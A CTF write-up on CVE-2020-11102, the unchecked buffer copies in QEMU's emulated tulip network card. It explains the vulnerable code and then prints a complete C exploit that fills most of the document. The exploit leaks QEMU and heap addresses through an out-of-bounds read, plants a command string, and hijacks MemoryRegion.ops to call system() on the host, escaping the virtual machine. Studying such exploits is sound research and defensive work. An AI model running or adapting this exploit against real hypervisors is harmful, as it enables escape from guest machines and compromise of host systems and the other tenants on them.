CVE-2020-11102: Escape from the Earth

Introduction

I recently participated in the Aliyun CTF competition and solved an interesting challenge based on CVE-2020-11102, a vulnerability in QEMU's emulated tulip network card that allows a guest OS to escape and execute arbitrary code on the host. In this article, I would like to share some details about the challenge and what I learned from it.

The vulnerability

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Append the transmit buffers described by @desc to s->tx_frame.
 *
 * The two byte counts are decoded from desc->control. For each non-zero
 * count, that many bytes are DMA-read from desc->buf_addr1 / desc->buf_addr2
 * into s->tx_frame at offset s->tx_frame_len, and s->tx_frame_len is then
 * advanced by the same amount. desc->status is set to 0 when at least one
 * byte was requested and to 0x7fffffff otherwise.
 *
 * NOTE: nothing in this function compares s->tx_frame_len + len1 (or + len2)
 * with the capacity of s->tx_frame, so the destination of pci_dma_read() can
 * lie outside the buffer.
 */
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
/* Requested sizes of buffer 1 and buffer 2, taken from the control word. */
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

if (len1) {
/* Destination is tx_frame + tx_frame_len; no bounds check precedes the copy. */
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

if (len2) {
/* Same pattern for the second buffer, starting where the first one ended. */
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
/* 0 if any data was requested, 0x7fffffff if both lengths were zero. */
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

Take a look at tulip_copy_tx_buffers() first. It copies len1 bytes from the guest buffer at desc->buf_addr1 to s->tx_frame + s->tx_frame_len. Notice that neither s->tx_frame_len nor len1 is checked against the size of tx_frame, and that s->tx_frame_len is increased by len1 after each copy. When we call this function multiple times, s->tx_frame_len can grow past the end of tx_frame, which causes a buffer overflow.

The same applies to tulip_copy_rx_bytes().

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/*
 * Copy pending received bytes from s->rx_frame to the buffers described by
 * @desc.
 *
 * s->rx_frame_len is the number of bytes still to be delivered and
 * s->rx_frame_size is used as the total frame size, so the read position is
 * rx_frame + (rx_frame_size - rx_frame_len). Each buffer receives at most its
 * own capacity (len1 / len2, decoded from desc->control) and at most the
 * number of bytes still pending; rx_frame_len is reduced by what was copied.
 *
 * NOTE: the read position and length are never checked against the size of
 * s->rx_frame, so inconsistent rx_frame_size / rx_frame_len values make
 * pci_dma_write() read outside the buffer.
 */
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
/* Capacities of buffer 1 and buffer 2, taken from the control word. */
int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
int len;

if (s->rx_frame_len && len1) {
/* len = min(rx_frame_len, len1) */
if (s->rx_frame_len > len1) {
len = len1;
} else {
len = s->rx_frame_len;
}
/* Source offset is derived purely from rx_frame_size and rx_frame_len. */
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}

if (s->rx_frame_len && len2) {
/* len = min(rx_frame_len, len2) */
if (s->rx_frame_len > len2) {
len = len2;
} else {
len = s->rx_frame_len;
}
/* Continues from where the first buffer stopped. */
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
}

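The tulip_copy_rx_bytes() function copies data from s->rx_frame to the guest buffers at desc->buf_addr1 and desc->buf_addr2. The read offset, s->rx_frame_size - s->rx_frame_len, is never checked against the size of rx_frame, so if these two fields hold inconsistent values the function reads outside the buffer. This results in a possible memory disclosure.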

Exploitation

Leak something first

To leak the QEMU base address and a heap address, we need to control s->rx_frame_size and s->rx_frame_len. Consider the following structure:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/*
 * Per-device state of the emulated tulip NIC.
 *
 * The layout matters for the bug discussed here: the two MemoryRegion members
 * are declared before the frame buffers, and the three int counters are
 * declared directly after tx_frame.
 */
typedef struct TULIPState {
PCIDevice dev;
/* Memory regions of the device; declared ahead of rx_frame/tx_frame. */
MemoryRegion io;
MemoryRegion memory;
NICConf c;
qemu_irq irq;
NICState *nic;
eeprom_t *eeprom;
uint32_t csr[16];

/* state for MII */
uint32_t old_csr9;
uint32_t mii_word;
uint32_t mii_bitcnt;

hwaddr current_rx_desc;
hwaddr current_tx_desc;

/* Fixed-size frame buffers of 2048 bytes each. */
uint8_t rx_frame[2048];
uint8_t tx_frame[2048];
/* Signed counters used as offsets into the buffers above; they follow tx_frame in declaration order. */
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
} TULIPState;

The tx_frame member is a fixed-size buffer of 2048 bytes, and tx_frame_len, rx_frame_len and rx_frame_size are declared right after it. By triggering tulip_copy_tx_buffers() multiple times, we can advance tx_frame_len to the end of the buffer and then overwrite tx_frame_len, rx_frame_len and rx_frame_size with values of our choice. Then we can trigger tulip_copy_rx_bytes() to copy heap memory back into the user space of the guest OS. With some calculation, we can easily recover the QEMU base address and the heap address.

After leaking the memory, we need to figure out how to get arbitrary code execution within the context of QEMU. This piece of code caught my attention:

1
2
3
4
5
6
7
8
9
/*
 * Access callbacks for the tulip memory regions: tulip_read and tulip_write
 * handle accesses, which are implemented as 4-byte little-endian operations.
 * The table is declared const.
 */
static const MemoryRegionOps tulip_ops = {
.read = tulip_read,
.write = tulip_write,
.endianness = DEVICE_LITTLE_ENDIAN,
.impl = {
/* Only 4-byte accesses are implemented. */
.min_access_size = 4,
.max_access_size = 4,
},
};

What if we could control the function pointers in tulip_ops? Unfortunately, tulip_ops is declared const, so it is not writable.

When initializing the memory region of TULIPState, the pointer to tulip_ops will be assigned to struct MemoryRegion.ops.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
    /*
     * Both regions embedded in the device state are initialised with the
     * same &tulip_ops table and with the device state `s` as the opaque
     * argument; each is 128 bytes in size.
     */
    memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s,
"tulip-io", 128);

memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s,
"tulip-mem", 128);

/*
 * QEMU's memory region object, quoted for its layout. The members relevant
 * to this article are `ops`, a pointer to a const MemoryRegionOps table, and
 * `opaque`, an untyped pointer stored next to it. The table itself is const,
 * but the `ops` pointer is an ordinary struct member.
 */
struct MemoryRegion {
Object parent_obj;

/* All fields are private - violators will be prosecuted */

/* The following fields should fit in a cache line */
bool romd_mode;
bool ram;
bool subpage;
bool readonly; /* For RAM regions */
bool nonvolatile;
bool rom_device;
bool flush_coalesced_mmio;
bool global_locking;
uint8_t dirty_log_mask;
bool is_iommu;
RAMBlock *ram_block;
Object *owner;

/* Callback table and the opaque pointer kept alongside it. */
const MemoryRegionOps *ops;
void *opaque;
MemoryRegion *container;
Int128 size;
hwaddr addr;
void (*destructor)(MemoryRegion *mr);
uint64_t align;
bool terminates;
bool ram_device;
bool enabled;
bool warning_printed; /* For reservations */
uint8_t vga_logging_count;
MemoryRegion *alias;
hwaddr alias_offset;
int32_t priority;
QTAILQ_HEAD(, MemoryRegion) subregions;
QTAILQ_ENTRY(MemoryRegion) subregions_link;
QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
const char *name;
unsigned ioeventfd_nb;
MemoryRegionIoeventfd *ioeventfds;
};

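The struct MemoryRegion instances (s->io and s->memory) are embedded in TULIPState, which is allocated on the heap, so their ops pointer is writable even though tulip_ops itself is not. We can therefore overwrite MemoryRegion.ops with the address of tx_frame and craft a fake struct MemoryRegionOps there.
Also, notice that tx_frame_len, rx_frame_len and rx_frame_size are all of type int, which means we can write backward (to addresses below tx_frame, where the MemoryRegion members live) if we overwrite these fields with negative values.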

Exploitation

The exploitation should be pretty straightforward and the comments in the code should be self-explanatory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <sys/types.h>
#include <unistd.h>

/* Page geometry used when translating virtual addresses: 4 KiB pages. */
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
/* Masks for a 64-bit /proc/self/pagemap entry: bit 63 and bits 0-54. */
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

/* Base I/O port added to every offset by the pmio_* helpers.
 * NOTE(review): presumably the tulip device's I/O BAR in the target VM - confirm. */
#define PMIO_BASE 0x000000000000c000
/* Port offset of CSR number _x (index multiplied by 8). */
#define CSR(_x) ((_x) << 3)
/* Not referenced by the code in this file.
 * NOTE(review): presumably the "suspended" transmit-state value - confirm. */
#define CSR5_TS_SUSPENDED 6

/*
 * Reference notes only; this region is excluded from compilation by #if 0.
 * It records the call chain from a register write down to the unchecked
 * pci_dma_read() and quotes the tulip_ts() helper.
 */
#if 0

tulip_write ->
tulip_xmit_list_update ->
tulip_copy_tx_buffers ->
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->

static uint32_t tulip_ts(TULIPState *s)
{
return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}

#endif

/*
 * Descriptor as built in guest memory by main(): four 32-bit words.
 * main() passes the descriptor's physical address to the device through a
 * CSR write.
 */
struct tulip_descriptor {
uint32_t status;    /* status/flag word, set by main() before each submission */
uint32_t control;   /* flag bits OR-ed with the two buffer lengths */
uint32_t buf_addr1; /* 32-bit address of the first buffer */
uint32_t buf_addr2; /* 32-bit address of the second buffer */
};

/* Descriptor for /proc/self/pagemap: opened in main(), read by gva_to_gfn(). */
int fd;

/* Return the offset of addr inside its page, i.e. its low PAGE_SHIFT bits. */
uint32_t page_offset(uint32_t addr) {
    const uint32_t in_page_mask = (1 << PAGE_SHIFT) - 1;

    return addr & in_page_mask;
}

uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

/*
 * Translate a virtual address of this process into a physical address:
 * frame number from gva_to_gfn() shifted up by PAGE_SHIFT, combined with the
 * in-page offset of addr. Aborts via assert() if the lookup reported failure.
 */
uint64_t gva_to_gpa(void *addr) {
    const uint64_t frame = gva_to_gfn(addr);

    assert(frame != -1);

    const uint64_t frame_start = frame << PAGE_SHIFT;
    const uint32_t within_page = page_offset((uint64_t)addr);

    return frame_start | within_page;
}

/* Read a 16-bit word from I/O port PMIO_BASE + port and return it widened to 64 bits. */
uint64_t pmio_read(uint64_t port) {
    return inw(PMIO_BASE + port);
}

/* Write the low 16 bits of val to I/O port PMIO_BASE + port (word-sized access). */
void pmio_write(uint64_t port, uint64_t val) {
    const unsigned short io_port = (unsigned short)(PMIO_BASE + port);
    const unsigned short word = (unsigned short)val;

    outw(word, io_port);
}

/* Write the low 32 bits of val to I/O port PMIO_BASE + port (long-sized access). */
void pmio_writel(uint64_t port, uint64_t val) {
    const unsigned short io_port = (unsigned short)(PMIO_BASE + port);
    const unsigned int dword = (unsigned int)val;

    outl(dword, io_port);
}

/*
 * Proof-of-concept driver for the CTF challenge described in this article.
 *
 * It runs in three stages, each of which builds descriptors in this process's
 * memory, translates their addresses with gva_to_gpa() and hands them to the
 * device through CSR port writes:
 *   stage1 - fill tx_frame, overwrite the counters behind it, read memory back
 *            into recv_buf and derive two base addresses from it;
 *   stage2 - set tx_frame_len to a negative value and place a command string
 *            at the resulting location;
 *   stage3 - place a fake ops table in tx_frame and overwrite
 *            MemoryRegion.ops with its address.
 *
 * NOTE(review): the numeric offsets used below (0x755f9f, 0xe11380, 2859620,
 * 0xe0fcf0, -0x3350, -0x2a28) are hard-coded; presumably they were measured
 * on the challenge's specific QEMU build and are not portable.
 *
 * argc/argv are unused. Return values of iopl() and malloc() are not checked,
 * and the allocations are never freed. Always returns 0.
 */
int main(int argc, char **argv) {
printf("[*] enter stage1\n");
int ret = 0; /* never read afterwards */
/* Pagemap handle used by gva_to_gfn() for address translation. */
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
/* Request I/O privilege level 3 so the in/out port helpers can be used. */
iopl(3);

// allocate the tx and rx descriptors
struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));

/* recv_buf receives the read-back data; buf is the filler payload. */
char *recv_buf = malloc(0x9000);
char *buf = malloc(0x1000);
memset(buf, 'A', 0x1000);
memset(recv_buf, 'B', 0x9000);

/* Buffer-1 length 0x400, buffer-2 length 0; both are OR-ed into the control word. */
int len1 = 0x400 << 0;
int len2 = 0 << 11;
/* NOTE(review): bit 31 is presumably the descriptor OWN bit (cf. the RDES0_OWN remark further down) - confirm. */
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
/* The 64-bit result of gva_to_gpa() is truncated to the 32-bit descriptor field. */
tx_desc->buf_addr1 = gva_to_gpa(buf);
/* Placeholder: with a buffer-2 length of 0 the second buffer is not copied. */
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

// get the physical address of the descriptor
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// set CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now

printf("[*] fill tx_frame\n");

// set tx descriptor (same payload again, this time without bit 29 in control)
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x800 now

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
/*
 * Mirrors the TULIPState members declared after tx_frame. Its size is
 * 3 * 4 + 4 + 16 * 6 = 112 (0x70) bytes.
 */
struct oob_data { // control the following fields in TULIPState
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
/* tulip_copy_tx_buffers() adds len1 after the copy, so the counter ends up at 0x400. */
oob_data->tx_frame_len = 0x400 - len1;
/*
 * With these two values, rx_frame_size - rx_frame_len is 2048 * 2, i.e. the
 * combined size of rx_frame and tx_frame, provided they are still in place
 * when tulip_copy_rx_bytes() runs.
 */
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);
/* Note: pmio_write() performs a 16-bit port write, unlike the pmio_writel() calls. */
pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // CSR6_OM_SHIFT trigger tulip_receive

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

/* Receive descriptor: up to 0x400 bytes into recv_buf, second buffer unused. */
int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

/* Dump the first 50 * 16 bytes of recv_buf as pairs of 64-bit words. */
printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
/*
 * Derive addresses from two 64-bit words of the dump (indices 0x1d and 22).
 * NOTE(review): the subtracted/added constants are presumably specific to
 * the challenge build - confirm before reuse.
 */
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

/*
 * The block opened here has its own scope: tx_desc_gpa and oob_data declared
 * inside it shadow the variables of the same name declared above.
 */
printf("[*] enter stage2\n"); {

/* Same two-step 0x400 + 0x400 fill as in stage1. */
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
/*
 * len1 is 0x70 here, so after tulip_copy_tx_buffers() adds it back the
 * counter becomes -0x3350 and the next copy lands 0x3350 bytes before tx_frame.
 * NOTE(review): presumably that is the start of the device state, which is
 * what the regions' opaque pointer refers to - confirm.
 */
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // trigger tulip_tx

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
/* 16-byte payload: an 8-byte string followed by 8 zero bytes as terminator. */
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // the ASCII bytes "cat flag" packed little-endian (0x67616c6620746163)
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}

// now control MemoryRegion.ops
printf("[*] enter stage3\n"); {
/*
 * Build a fake ops table at the start of buf; it is copied into tx_frame by
 * the fill below.
 * NOTE(review): words 0 and 1 presumably line up with the .read and .write
 * members, and word 8 (two 32-bit values of 4) with the access-size fields
 * shown in tulip_ops - confirm against the MemoryRegionOps definition.
 */
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
/* Same two-step 0x400 + 0x400 fill as in the earlier stages. */
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
/* As in stage2, the 0x70 is cancelled by the post-copy increment, leaving -0x2a28. */
oob_data->tx_frame_len = -0x2a28-0x70; // now points to the MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
printf("[*] hijack ops\n");
/* Only the first 8 bytes are sent: the value computed above as frame_base. */
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);

// trigger the ops.write
pmio_writel(CSR(4), tx_desc_gpa);
}

return 0;
}